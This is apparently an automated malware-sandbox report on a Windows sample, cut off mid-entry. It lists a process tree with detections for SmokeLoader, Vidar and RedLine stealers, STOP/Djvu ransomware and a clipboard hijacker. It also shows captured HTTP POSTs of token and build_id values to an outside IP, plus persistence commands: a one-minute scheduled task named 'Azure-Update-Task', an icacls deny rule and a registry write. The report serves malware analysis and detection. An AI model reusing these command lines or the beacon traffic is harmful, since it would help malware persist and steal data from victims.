                                                                                              2024-05-25 19:30:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DHJECFCGHIDGHIDHDHIECont
                                                                                              2024-05-25 19:30:35 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.44981465.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:36 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DHCBAEHJJJKKFIDGHJECCont
                                                                                              2024-05-25 19:30:37 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:15:28:56
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:240'128 bytes
                                                                                              MD5 hash:A25AC46E5BEA920465D1838177782E5B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:15:29:01
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                              Imagebase:0x7ff72b770000
                                                                                              File size:5'141'208 bytes
                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:15:29:23
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Roaming\rujtcgu
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\rujtcgu
                                                                                              Imagebase:0x400000
                                                                                              File size:240'128 bytes
                                                                                              MD5 hash:A25AC46E5BEA920465D1838177782E5B
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 32%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:15:29:25
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "
                                                                                              Imagebase:0x7ff729c50000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:15:29:25
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:15:29:25
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                              Imagebase:0x1b0000
                                                                                              File size:77'312 bytes
                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:15:29:35
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:15:29:35
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:15:29:37
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                              Imagebase:0xbc0000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:15:29:37
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:15:29:38
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:16
                                                                                              Start time:15:29:39
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:17
                                                                                              Start time:15:29:40
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:18
                                                                                              Start time:15:29:42
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:232'448 bytes
                                                                                              MD5 hash:4F54B83888A62CDD3584C0A0FEE970D8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 81%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:19
                                                                                              Start time:15:29:43
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:232'448 bytes
                                                                                              MD5 hash:4F54B83888A62CDD3584C0A0FEE970D8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:21
                                                                                              Start time:15:29:44
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C01.bat" "
                                                                                              Imagebase:0x7ff729c50000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:22
                                                                                              Start time:15:29:44
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:23
                                                                                              Start time:15:29:44
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                              Imagebase:0x7ff714330000
                                                                                              File size:77'312 bytes
                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:25
                                                                                              Start time:15:29:46
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:26
                                                                                              Start time:15:29:48
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:306'688 bytes
                                                                                              MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 87%, ReversingLabs
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:27
                                                                                              Start time:15:29:49
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
                                                                                              Imagebase:0x400000
                                                                                              File size:751'104 bytes
                                                                                              MD5 hash:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:28
                                                                                              Start time:15:29:57
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:306'688 bytes
                                                                                              MD5 hash:41B883A061C95E9B9CB17D4CA50DE770
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              Has exited:true

                                                                                              Target ID:29
                                                                                              Start time:15:29:57
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                              Imagebase:0xf30000
                                                                                              File size:187'904 bytes
                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:30
                                                                                              Start time:15:29:57
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:31
                                                                                              Start time:15:29:58
                                                                                              Start date:25/05/2024
                                                                                              Path:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              Wow64 process (32bit):true
